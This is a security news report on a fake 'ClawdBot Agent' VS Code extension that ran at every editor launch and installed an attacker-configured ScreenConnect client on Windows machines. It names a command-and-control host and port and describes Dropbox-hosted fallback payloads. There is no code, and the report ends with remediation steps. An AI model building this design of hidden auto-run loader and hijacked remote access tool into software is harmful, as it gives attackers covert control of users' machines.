A malicious VS Code extension has surfaced in the digital threat landscape, targeting developers who rely on coding tools daily.
Discovered on January 27, 2026, the fake “ClawdBot Agent” extension presented itself as a legitimate AI-powered assistant, but it concealed a dangerous payload underneath.
Unlike the actual Clawdbot service, which never released an official VS Code extension, this imposter successfully registered the name first and tricked users into installing it.
The threat immediately caught the attention of security monitoring systems, which detected unusual activity the moment VS Code launched.
The deception runs deeper than a simple name theft. The extension functioned exactly like advertised, integrating with popular AI providers including OpenAI, Anthropic, and Google.
This working functionality created a false sense of security, as users had no reason to suspect malicious behavior.
Within seconds of installation, the extension began its attack, silently deploying malware onto Windows machines without user knowledge or consent. Microsoft acted swiftly upon notification and removed the extension from its marketplace.
Aikido security analysts identified the true nature of this threat after detailed investigation. They discovered that the extension contained code designed to run automatically every time VS Code started.
The JavaScript code established a connection to an external server to fetch configuration instructions, which then downloaded and executed multiple malicious files disguised as legitimate system components.
Infection Mechanism and ScreenConnect Deployment
The most concerning aspect involves how the attackers weaponized legitimate remote access software.
When executed, the dropper deployed ScreenConnect, a trusted IT support tool, configured to communicate with attacker-controlled servers at meeting.bulletmailer.net on port 8041.
The attackers created their own ScreenConnect relay server and pre-configured client installers, distributing them through the VS Code extension.
Victims unknowingly received a fully functional ScreenConnect client that immediately established remote connections to the attacker’s infrastructure.
A Rust-based DLL file provided redundant delivery capability, fetching backup payloads from Dropbox disguised as a Zoom update.
This multi-layered approach ensured success even if primary command-and-control servers were disabled. The attackers employed three separate fallback mechanisms, demonstrating sophisticated operational planning.
Users who installed this extension should immediately uninstall it, remove ScreenConnect from their systems, and block the infrastructure domains.
Rotating API keys for any AI services accessed through the extension is strongly recommended. The threat underscores the importance of verifying extension authenticity before installation.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
